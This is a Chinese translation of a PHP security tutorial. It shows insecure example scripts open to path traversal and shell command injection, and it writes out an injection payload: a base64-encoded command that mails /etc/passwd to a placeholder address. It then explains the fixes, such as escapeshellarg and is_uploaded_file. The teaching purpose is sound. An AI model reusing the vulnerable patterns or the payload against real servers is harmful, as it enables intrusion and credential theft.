PHP安全及相關_PHP

關注安全問題的重要性
看到的遠非全部

阻止使用者惡意破壞你的程式最有效卻經常被忽略的方法是在寫代碼時就考慮它的可能性。留意代碼中可能的安全問題是很重要的。考慮下邊的旨在簡化用PHP中寫入大量文字檔的過程的執行個體函數：


function write_text($filename, $text="") {
static $open_files = array();
// 如果檔案名稱空，關閉全部檔案
if ($filename == NULL) {
foreach($open_files as $fr) {
fclose($fr);
}
return true;
}
$index = md5($filename);
if(!isset($open_files[$index])) {
$open_files[$index] = fopen($filename, "a+");
if(!$open_files[$index]) return false;
}
fputs($open_files[$index], $text);
return true;
}
?>

這個函數帶有兩個預設參數，檔案名稱和要寫入檔案的文本。
函數將先檢查檔案是否已被開啟；如果是，將使用原來的檔案控制代碼。否則，將自行建立。在這兩種情況中，文本都會被寫入檔案。
如果傳遞給函數的檔案名稱是NULL，那麼所有開啟的檔案將被關閉。下邊提供了一個使用上的執行個體。
如果開發人員以下邊的格式來寫入多個文字檔，那麼這個函數將清楚和易讀的多。
讓我們假定這個函數存在於一個單獨的檔案中，這個檔案包含了調用這個函數的代碼。
下邊是一個這樣的程式，我們叫它quotes.php：




include_once('write_text.php');
$filename = "/home/web/quotes/{$_GET['quote']}";
$quote_msg = $_GET['quote_text'];
if (write_text($filename, $quote_msg)) {
echo "

Quote saved!

";
} else {
echo "

Error writing quote

";
}
write_text(NULL);
?>

如同你看到的，這位開發人員使用了write_text()函數來建立一個體系使得使用者可以提交他們喜歡的格言，這些格言將被存放在一個文字檔中。
不幸的是，開發人員可能沒有想到，這個程式也允許了惡意使用者危害web server的安全。
也許現在你正撓著頭想著究竟這個看起來很無辜的程式怎樣引入了安全風險。
如果你看不出來，考慮下邊這個URL，記住這個程式叫做quotes.php：

http://www.somewhere.com/fun/quotes.php?quote=different_file.dat&quote_text=garbage+data

當這個URL傳遞給web server 時將會發生什嗎？

顯然，quotes.php將被執行，但是，不是將一句格言寫入到我們希望的三個檔案中之一，相反的，一個叫做different_file.dat的新檔案將被建立，其中包含一個字串garbage data。

顯然，這不是我們希望的行為，惡意使用者可能通過把quote指定為../../../etc/passwd來訪問UNIX密碼檔案從而建立一個帳號（儘管這需要web server以superuser運行程式，如果是這樣的，你應該停止閱讀，馬上去修複它）。

如果/home/web/quotes/可以通過瀏覽器訪問，可能這個程式最嚴重的安全問題是它允許任何使用者寫入和運行任意PHP程式。這將帶來無窮的麻煩。

這裡有一些解決方案。如果你只需要寫入目錄下的一些檔案，可以考慮使用一個相關的數組來存放檔案名稱。如果使用者輸入的檔案存在於這個數組中，就可以安全的寫入。另一個想法是去掉所有的不是數字和字母的字元來確保沒有目錄分割符號。還有一個辦法是檢查檔案的副檔名來保證檔案不會被web server執行。

原則很簡單，作為一個開發人員你必須比程式在你希望的情況下運行時考慮更多。

如果非法資料進入到一個form元素中會發生什嗎？惡意使用者是否能使你的程式以不希望的方式運行？什麼方法能阻止這些攻擊？你的web server和PHP程式只有在最弱的安全連結下才安全，所以確認這些可能不安全的連結是否安全很重要。

常見的涉及安全的錯誤

這裡給出一些要點，一個可能危及安全的編碼上的和管理上的失誤的簡要不完整列表


錯誤1。信賴資料
這是貫穿於我關於PHP程式安全的討論的主題，你決不能相信一個來自外部的資料。不管它來自使用者提交表單，檔案系統的檔案或者環境變數，任何資料都不能簡單的想當然的採用。所以使用者輸入必須進行驗證並將之格式化以保證安全。

錯誤2。在web目錄中儲存敏感性資料
任何和所有的敏感性資料都應該存放在獨立於需要使用資料的程式的檔案中，並儲存在一個不能通過瀏覽器訪問的目錄下。當需要使用敏感性資料時，再通過include 或 require語句來包含到適當的PHP程式中。

錯誤3。不使用推薦的安全防範措施
PHP手冊包含了在使用和編寫PHP程式時關於安全防範的完整章節。手冊也（幾乎）基於案例清楚的說明了什麼時候存在潛在安全風險和怎麼將風險降低到最低。又如，惡意使用者依靠開發人員和管理員的失誤得到關心的安全資訊以擷取系統的許可權。留意這些警告並適當的採取措施來減小惡意使用者給你的系統帶來真正的破壞的可能性。


在PHP中執行系統調用
在PHP中有很多方法可以執行系統調用。

比如，system()， exec()， passthru()， popen()和 反單引號（`）操作符都允許你在程式中執行系統調用。如果不適當的使用上邊這些函數將會為惡意使用者在你的伺服器上執行系統命令開啟大門。像在訪問檔案時，絕大多數情況下，安全性漏洞發生在由於不可靠的外部輸入導致的系統命令執行。

使用系統調用的一個例子程式
考慮一個處理http檔案上傳的程式，它使用zip程式來壓縮檔，然後把它移動到指定的目錄（預設為/usr/local/archives/）。代碼如下：


$zip = "/usr/bin/zip";
$store_path = "/usr/local/archives/";

if (isset($_FILES['file'])) {
$tmp_name = $_FILES['file']['tmp_name'];
$cmp_name = dirname($_FILES['file']['tmp_name']) .
"/{$_FILES['file']['name']}.zip";
$filename = basename($cmp_name);

if (file_exists($tmp_name)) {
$systemcall = "$zip $cmp_name $tmp_name";
$output = `$systemcall`;

if (file_exists($cmp_name)) {
$savepath = $store_path.$filename;
rename($cmp_name, $savepath);
}
}
}
?>


雖然這段程式看起來相當簡單易懂，但是惡意使用者卻可以通過一些方法來利用它。最嚴重的安全問題存在於我們執行了壓縮命令（通過`操作符），在下邊的行中可以清楚的看到這點：

if (isset($_FILES['file'])) {
$tmp_name = $_FILES['file']['tmp_name'];
$cmp_name = dirname($_FILES['file']['tmp_name']) .
"/{$_FILES['file']['name']}.zip";

$filename = basename($cmp_name);

if (file_exists($tmp_name)) {
$systemcall = "$zip $cmp_name $tmp_name";
$output = `$systemcall`;
...
欺騙程式執行任意shell命令
雖然這段代碼看起來相當安全，它卻有使任何有檔案上傳許可權的使用者執行任意shell命令的潛在危險！

準確的說，這個安全性漏洞來自對$cmp_name變數的賦值。在這裡，我們希望壓縮後的檔案使用從客戶機上傳時的檔案名稱（帶有 .zip副檔名）。我們用到了$_FILES['file']['name']（它包含了上傳檔案在客戶機時的檔案名稱）。

在這樣的情況下，惡意使用者完全可以通過上傳一個含對底層作業系統有特殊意義字元的檔案來達到自己的目的。舉個例子，如果使用者按照下邊的形式建立一個空檔案會怎麼樣？（UNIX shell提示符下）

[user@localhost]# touch ";php -r '$code=base64_decode(
"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
system($code);';"
這個命令將建立一個名字如下的檔案：

;php -r '$code=base64_decode(
"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
system($code);';
看起來很奇怪？讓我們來看看這個“檔案名稱”，我們發現它很像使CLI版本的PHP執行如下代碼的命令：
$code=base64_decode(
"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
system($code);
?>
如果你出於好奇而顯示$code變數的內容，就會發現它包含了mail baduser@somewhere.com < /etc/passwd。如果使用者把這個檔案傳給程式，接著PHP執行系統調用來壓縮檔，PHP實際上將執行如下語句：

/usr/bin/zip /tmp/;php -r
'$code=base64_decode(
"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
system($code);';.zip /tmp/phpY4iatI
讓人吃驚的，上邊的命令不是一個語句而是3個！由於UNIX shell 把分號（;）解釋為一個shell命令的結束和另一命令的開始，除了分號在在引號中時，PHP的system()實際上將如下執行：

[user@localhost]# /usr/bin/zip /tmp/
[user@localhost]# php -r
'$code=base64_decode(
"bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
system($code);'
[user@localhost]# .zip /tmp/phpY4iatI
如你所見，這個看起來無害的PHP程式突然變成執行任意shell命令和其他PHP程式的後門。雖然這個例子只會在路徑下有CLI版本的PHP的系統上有效，但是用這種技術可以通過其他的方法來達到同樣的效果。

對抗系統調用攻擊
這裡的關鍵仍然是，來自使用者的輸入，不管內容如何，都不應該相信！問題仍然是如何在使用系統調用時（除了根本不使用它們）避免類似的情況出現。為了對抗這種類型的攻擊，PHP提供了兩個函數，escapeshellarg() 和 escapeshellcmd()。

escapeshellarg()函數是為了從用作系統命令的參數的使用者輸入（在我們的例子中，是zip命令）中移出含有潛在危險的字元而設計的。這個函數的文法如下：

escapeshellarg($string)
$string所在處是用於過濾的輸入，傳回值是過濾後的字元。執行時，這個函數將在字元兩邊添加單引號，並轉義原來字串中的單引號（在其前邊加上）。在我們的常式中，如果我們在執行系統命令之前加上這些行：

$cmp_name = escapeshellarg($cmp_name);
$tmp_name = escapeshellarg($tmp_name);
我們就能通過確保傳遞給系統調用的參數已經處理，是一個沒有其他意圖的使用者輸入，以規避這樣的安全風險。

escapeshellcmd()和escapeshellarg()類似，只是它只轉義對底層作業系統有特殊意義的字元。和escapeshellarg()不同，escapeshellcmd()不會處理內容中的空白欄框。舉個執行個體，當使用escapeshellcmd()轉義時，字元

$string = "'hello, world!';evilcommand"
將變為：

'hello, world';evilcommand
如果這個字串用作系統調用的參數它將仍然不能得到正確的結果，因為shell將會把它分別解釋為兩個分離的參數: 'hello 和 world';evilcommand。如果使用者輸入用於系統調用的參數列表部分，escapeshellarg()是一個更好的選擇。


保護上傳的檔案
在整篇文章中，我一直只著重講系統調用如何被惡意使用者劫持以產生我們不希望結果。
但是，這裡還有另外一個潛在的安全風險值得提到。再看到我們的常式，把你的注意力集中在下邊的行上：

$tmp_name = $_FILES['file']['tmp_name'];
$cmp_name = dirname($_FILES['file']['tmp_name']) .
"/{$_FILES['file']['name']}.zip";

$filename = basename($cmp_name);
if (file_exists($tmp_name)) {
上邊片斷中的程式碼導致的一個潛在安全風險是，最後一行我們判斷上傳的檔案是否實際存在（以臨時檔案名稱$tmp_name存在）。

這個安全風險並不來自於PHP自身，而在於儲存在$tmp_name中的檔案名稱實際上根本不是一個檔案，而是指向惡意使用者希望訪問的檔案，比如，/etc/passwd。

為了防止這樣的情況發生，PHP提供了is_uploaded_file()函數，它和file_exists()一樣，但是它還提供檔案是否真的從客戶機上上傳的檢查。

在絕大多數情況下，你將需要移動上傳的檔案，PHP提供了move_uploaded_file()函數，來配合is_uploaded_file()。這個函數和rename()一樣用於移動檔案，只是它會在執行前自動檢查以確保被移動的檔案是上傳的檔案。move_uploaded_file()的文法如下：

move_uploaded_file($filename, $destination);
在執行時，函數將移動上傳檔案$filename到目的地$destination並返回一個布爾值來標誌操作是否成功。

註： John Coggeshall 是一位PHP顧問和作者。從他開始為PHP不眠已經5年左右了。
英文原文：http://www.onlamp.com/pub/a/php/2003/08/28/php_foundations.html

